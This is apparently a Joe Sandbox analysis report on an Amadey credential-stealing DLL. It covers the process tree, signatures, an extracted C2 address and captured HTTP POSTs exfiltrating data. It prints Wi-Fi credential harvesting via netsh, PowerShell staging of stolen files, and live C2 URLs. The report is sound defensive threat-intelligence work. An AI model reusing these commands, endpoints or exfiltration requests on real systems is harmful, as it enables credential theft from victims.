Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
cred64.dll.dll

Overview

General Information

Sample name:cred64.dll.dll
(renamed file extension from exe to dll)
Original sample name:cred64.dll.exe
Analysis ID:1579621
MD5:d862c12a4467ebae581a8c0cc3ea2211
SHA1:9e797375b9b4422b2314d3e372628643ccf1c5db
SHA256:47f8a270b27c18bab9013f4a8f0ee6e877e4050bd4018d682eb502bcfd5bff6d
Tags:Amadeydllexeuser-abuse_ch
Infos:

Detection

Amadey
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Amadeys stealer DLL
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Loading BitLocker PowerShell Module
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Instant Messenger accounts or passwords
Uses netsh to modify the Windows network and firewall settings
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • loaddll64.exe (PID: 6608 cmdline: loaddll64.exe "C:\Users\user\Desktop\cred64.dll.dll" MD5: 763455F9DCB24DFEECC2B9D9F8D46D52)
    • conhost.exe (PID: 6596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6816 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\cred64.dll.dll",#1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • rundll32.exe (PID: 6868 cmdline: rundll32.exe "C:\Users\user\Desktop\cred64.dll.dll",#1 MD5: EF3179D498793BF4234F708D3BE28633)
        • netsh.exe (PID: 6960 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
          • conhost.exe (PID: 7048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 6276 cmdline: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 4412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rundll32.exe (PID: 6836 cmdline: rundll32.exe C:\Users\user\Desktop\cred64.dll.dll,Main MD5: EF3179D498793BF4234F708D3BE28633)
      • netsh.exe (PID: 6956 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
        • conhost.exe (PID: 7044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7116 cmdline: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rundll32.exe (PID: 2588 cmdline: rundll32.exe C:\Users\user\Desktop\cred64.dll.dll,Save MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 2836 cmdline: rundll32.exe "C:\Users\user\Desktop\cred64.dll.dll",Main MD5: EF3179D498793BF4234F708D3BE28633)
      • netsh.exe (PID: 7156 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
        • conhost.exe (PID: 6412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4916 cmdline: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 1352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rundll32.exe (PID: 2920 cmdline: rundll32.exe "C:\Users\user\Desktop\cred64.dll.dll",Save MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Malware Configuration

Threatname: Amadey

{"C2 url": "212.193.31.8/3ofn3jf3e2ljk2/index.php", "Version": "5.12"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
cred64.dll.dllJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security

    Sigma Signatures

    System Summary

    barindex
    Sigma detected: Suspicious Script Execution From Temp Folder
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: rundll32.exe "C:\Users\user\Desktop\cred64.dll.dll",#1, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 6868, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, ProcessId: 6276, ProcessName: powershell.exe
    Sigma detected: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet
    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems), frack113: Data: Command: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: rundll32.exe "C:\Users\user\Desktop\cred64.dll.dll",#1, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 6868, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, ProcessId: 6276, ProcessName: powershell.exe
    Sigma detected: Non Interactive PowerShell Process Spawned
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: rundll32.exe "C:\Users\user\Desktop\cred64.dll.dll",#1, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 6868, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, ProcessId: 6276, ProcessName: powershell.exe

    Stealing of Sensitive Information

    barindex
    Sigma detected: Capture Wi-Fi password
    Source: Process startedAuthor: Joe Security: Data: Command: netsh wlan show profiles, CommandLine: netsh wlan show profiles, CommandLine|base64offset|contains: l, Image: C:\Windows\System32\netsh.exe, NewProcessName: C:\Windows\System32\netsh.exe, OriginalFileName: C:\Windows\System32\netsh.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\cred64.dll.dll,Main, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 6836, ParentProcessName: rundll32.exe, ProcessCommandLine: netsh wlan show profiles, ProcessId: 6956, ProcessName: netsh.exe

    Suricata Signatures

    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-12-23T06:38:24.614773+010028561501A Network Trojan was detected192.168.2.449730212.193.31.880TCP
    2024-12-23T06:38:24.630041+010028561501A Network Trojan was detected192.168.2.449731212.193.31.880TCP
    2024-12-23T06:38:30.770706+010028561501A Network Trojan was detected192.168.2.449732212.193.31.880TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-12-23T06:38:24.614773+010028552391A Network Trojan was detected192.168.2.449730212.193.31.880TCP
    2024-12-23T06:38:24.630041+010028552391A Network Trojan was detected192.168.2.449731212.193.31.880TCP
    2024-12-23T06:38:30.770706+010028552391A Network Trojan was detected192.168.2.449732212.193.31.880TCP

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Found malware configuration
    Source: cred64.dll.dllMalware Configuration Extractor: Amadey {"C2 url": "212.193.31.8/3ofn3jf3e2ljk2/index.php", "Version": "5.12"}
    Multi AV Scanner detection for submitted file
    Source: cred64.dll.dllReversingLabs: Detection: 36%
    Source: cred64.dll.dllVirustotal: Detection: 38%Perma Link
    AI detected suspicious sample
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.3% probability
    Source: cred64.dll.dllStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbt+. source: powershell.exe, 00000011.00000002.2073544837.000001934FD1C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: Automation.pdb source: powershell.exe, 00000015.00000002.2153748068.000001C321304000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000011.00000002.2070821730.000001934FCAE000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.pdb source: powershell.exe, 00000011.00000002.2064588985.000001934FA40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2153160648.000001C32129C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: pdblib.pdb source: powershell.exe, 00000011.00000002.2064588985.000001934FA8B000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000011.00000002.2072598626.000001934FCE3000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Core.pdb source: powershell.exe, 00000015.00000002.2155215235.000001C321490000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: lib.pdbz source: powershell.exe, 00000015.00000002.2153160648.000001C32129C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: CallSite.Target.pdbe35 source: powershell.exe, 00000011.00000002.2074774615.000001934FD68000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: ion.pdb source: powershell.exe, 00000015.00000002.2153748068.000001C3212F3000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: D:\Mktmp\StealerDLL\x64\Release\STEALERDLL.pdb source: cred64.dll.dll
    Source: Binary string: softy.pdbvice source: powershell.exe, 00000011.00000002.2073544837.000001934FD1C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.pdbk source: powershell.exe, 00000015.00000002.2155215235.000001C321490000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Management.Automation.pdbA56-E329-4D4D1%0# source: powershell.exe, 00000015.00000002.2155215235.000001C321490000.00000004.00000020.00020000.00000000.sdmp
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\userJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\OneDrive\desktop.iniJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppDataJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\Videos\desktop.iniJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\Music\desktop.iniJump to behavior

    Networking

    barindex
    Suricata IDS alerts for network traffic
    Source: Network trafficSuricata IDS: 2855239 - Severity 1 - ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST) : 192.168.2.4:49730 -> 212.193.31.8:80
    Source: Network trafficSuricata IDS: 2855239 - Severity 1 - ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST) : 192.168.2.4:49731 -> 212.193.31.8:80
    Source: Network trafficSuricata IDS: 2856150 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M6 : 192.168.2.4:49730 -> 212.193.31.8:80
    Source: Network trafficSuricata IDS: 2855239 - Severity 1 - ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST) : 192.168.2.4:49732 -> 212.193.31.8:80
    Source: Network trafficSuricata IDS: 2856150 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M6 : 192.168.2.4:49731 -> 212.193.31.8:80
    Source: Network trafficSuricata IDS: 2856150 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M6 : 192.168.2.4:49732 -> 212.193.31.8:80
    System process connects to network (likely due to code injection or exploit)
    Source: C:\Windows\System32\rundll32.exeNetwork Connect: 212.193.31.8 80Jump to behavior
    C2 URLs / IPs found in malware configuration
    Source: Malware configuration extractorIPs: 212.193.31.8
    Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 21Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d Data Ascii: id=246122658369&cred=
    Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 21Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d Data Ascii: id=246122658369&cred=
    Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 21Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d Data Ascii: id=246122658369&cred=
    Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php?wal=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----MzA4NA==Host: 212.193.31.8Content-Length: 3244Cache-Control: no-cache
    Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php?wal=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----MzA4NA==Host: 212.193.31.8Content-Length: 3244Cache-Control: no-cache
    Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php?wal=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----MzA4NA==Host: 212.193.31.8Content-Length: 3244Cache-Control: no-cache
    Source: Joe Sandbox ViewASN Name: SPD-NETTR SPD-NETTR
    Source: unknownTCP traffic detected without corresponding DNS query: 212.193.31.8
    Source: unknownTCP traffic detected without corresponding DNS query: 212.193.31.8
    Source: unknownTCP traffic detected without corresponding DNS query: 212.193.31.8
    Source: unknownTCP traffic detected without corresponding DNS query: 212.193.31.8
    Source: unknownTCP traffic detected without corresponding DNS query: 212.193.31.8
    Source: unknownTCP traffic detected without corresponding DNS query: 212.193.31.8
    Source: unknownTCP traffic detected without corresponding DNS query: 212.193.31.8
    Source: unknownTCP traffic detected without corresponding DNS query: 212.193.31.8
    Source: unknownTCP traffic detected without corresponding DNS query: 212.193.31.8
    Source: unknownTCP traffic detected without corresponding DNS query: 212.193.31.8
    Source: unknownTCP traffic detected without corresponding DNS query: 212.193.31.8
    Source: unknownTCP traffic detected without corresponding DNS query: 212.193.31.8
    Source: unknownTCP traffic detected without corresponding DNS query: 212.193.31.8
    Source: unknownTCP traffic detected without corresponding DNS query: 212.193.31.8
    Source: unknownTCP traffic detected without corresponding DNS query: 212.193.31.8
    Source: unknownTCP traffic detected without corresponding DNS query: 212.193.31.8
    Source: unknownTCP traffic detected without corresponding DNS query: 212.193.31.8
    Source: unknownTCP traffic detected without corresponding DNS query: 212.193.31.8
    Source: unknownTCP traffic detected without corresponding DNS query: 212.193.31.8
    Source: unknownTCP traffic detected without corresponding DNS query: 212.193.31.8
    Source: unknownTCP traffic detected without corresponding DNS query: 212.193.31.8
    Source: unknownTCP traffic detected without corresponding DNS query: 212.193.31.8
    Source: unknownTCP traffic detected without corresponding DNS query: 212.193.31.8
    Source: unknownTCP traffic detected without corresponding DNS query: 212.193.31.8
    Source: unknownTCP traffic detected without corresponding DNS query: 212.193.31.8
    Source: unknownTCP traffic detected without corresponding DNS query: 212.193.31.8
    Source: unknownTCP traffic detected without corresponding DNS query: 212.193.31.8
    Source: unknownTCP traffic detected without corresponding DNS query: 212.193.31.8
    Source: unknownTCP traffic detected without corresponding DNS query: 212.193.31.8
    Source: unknownTCP traffic detected without corresponding DNS query: 212.193.31.8
    Source: unknownTCP traffic detected without corresponding DNS query: 212.193.31.8
    Source: unknownTCP traffic detected without corresponding DNS query: 212.193.31.8
    Source: unknownTCP traffic detected without corresponding DNS query: 212.193.31.8
    Source: unknownTCP traffic detected without corresponding DNS query: 212.193.31.8
    Source: unknownTCP traffic detected without corresponding DNS query: 212.193.31.8
    Source: unknownTCP traffic detected without corresponding DNS query: 212.193.31.8
    Source: unknownTCP traffic detected without corresponding DNS query: 212.193.31.8
    Source: unknownTCP traffic detected without corresponding DNS query: 212.193.31.8
    Source: unknownTCP traffic detected without corresponding DNS query: 212.193.31.8
    Source: unknownTCP traffic detected without corresponding DNS query: 212.193.31.8
    Source: unknownTCP traffic detected without corresponding DNS query: 212.193.31.8
    Source: unknownTCP traffic detected without corresponding DNS query: 212.193.31.8
    Source: unknownTCP traffic detected without corresponding DNS query: 212.193.31.8
    Source: unknownTCP traffic detected without corresponding DNS query: 212.193.31.8
    Source: unknownTCP traffic detected without corresponding DNS query: 212.193.31.8
    Source: unknownTCP traffic detected without corresponding DNS query: 212.193.31.8
    Source: unknownTCP traffic detected without corresponding DNS query: 212.193.31.8
    Source: unknownTCP traffic detected without corresponding DNS query: 212.193.31.8
    Source: unknownTCP traffic detected without corresponding DNS query: 212.193.31.8
    Source: unknownTCP traffic detected without corresponding DNS query: 212.193.31.8
    Source: unknownHTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 21Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d Data Ascii: id=246122658369&cred=
    Source: rundll32.exe, 00000003.00000002.2312584434.000001D604B90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2312083818.000001CFA51C5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.2388934623.0000023142F98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.193.31.8/
    Source: rundll32.exe, 00000004.00000002.2312083818.000001CFA51C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.193.31.8/%
    Source: rundll32.exe, 00000003.00000002.2312179824.000001D602CEB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2312083818.000001CFA5108000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.2388934623.0000023142F32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.php
    Source: rundll32.exe, 00000003.00000002.2312179824.000001D602C68000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.2312584434.000001D604B90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2312083818.000001CFA519C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2312083818.000001CFA51E8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.2388934623.0000023142F98000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.2388934623.0000023142F7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.php?wal=1
    Source: rundll32.exe, 00000003.00000002.2312584434.000001D604B90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.php?wal=1$
    Source: rundll32.exe, 00000003.00000002.2312584434.000001D604B90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.php?wal=1?
    Source: rundll32.exe, 0000000A.00000002.2388934623.0000023142F77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.php?wal=1art
    Source: rundll32.exe, 00000004.00000002.2312083818.000001CFA5108000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.php?wal=1d
    Source: rundll32.exe, 00000003.00000002.2312584434.000001D604B90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.php?wal=1e=
    Source: rundll32.exe, 0000000A.00000002.2388934623.0000023142F98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.php?wal=1n
    Source: rundll32.exe, 00000004.00000002.2312083818.000001CFA5108000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.php?wal=1q
    Source: rundll32.exe, 00000004.00000002.2312083818.000001CFA5108000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.php?wal=1s
    Source: rundll32.exe, 00000003.00000002.2312179824.000001D602CEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.phpg
    Source: rundll32.exe, 00000004.00000002.2312083818.000001CFA519C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.193.31.8/Z
    Source: rundll32.exe, 00000003.00000002.2312584434.000001D604B90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.193.31.8/a
    Source: rundll32.exe, 0000000A.00000002.2388934623.0000023142F98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.193.31.8/lorer
    Source: rundll32.exe, 0000000A.00000002.2388934623.0000023142F98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.193.31.8/nes
    Source: powershell.exe, 00000011.00000002.1991200108.0000019339295000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1986032115.00000279018D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2038525364.0000027910071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2143656005.000001C319220000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2036697236.000001C30AC52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000015.00000002.2036697236.000001C3093D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2036697236.000001C30AA34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000011.00000002.1991200108.0000019337BE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1986032115.0000027900228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2036697236.000001C3093D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
    Source: powershell.exe, 00000011.00000002.1991200108.00000193379C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1986032115.0000027900001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2036697236.000001C3091B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000011.00000002.1991200108.0000019337BE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1986032115.0000027900228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2036697236.000001C3093D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
    Source: powershell.exe, 00000015.00000002.2036697236.000001C3093D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2036697236.000001C30AA34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: powershell.exe, 00000011.00000002.1991200108.00000193379C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1986032115.0000027900001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2036697236.000001C3091B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
    Source: powershell.exe, 00000015.00000002.2036697236.000001C30A2E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2036697236.000001C30A4C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
    Source: powershell.exe, 00000011.00000002.1991200108.0000019338FEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1986032115.00000279014B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2036697236.000001C30A7DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
    Source: powershell.exe, 00000015.00000002.2143656005.000001C319220000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000015.00000002.2143656005.000001C319220000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000015.00000002.2143656005.000001C319220000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 00000015.00000002.2036697236.000001C3093D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2036697236.000001C30AA34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000015.00000002.2036697236.000001C30AA84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
    Source: powershell.exe, 00000011.00000002.1991200108.0000019339295000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1986032115.00000279018D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2038525364.0000027910071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2143656005.000001C319220000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
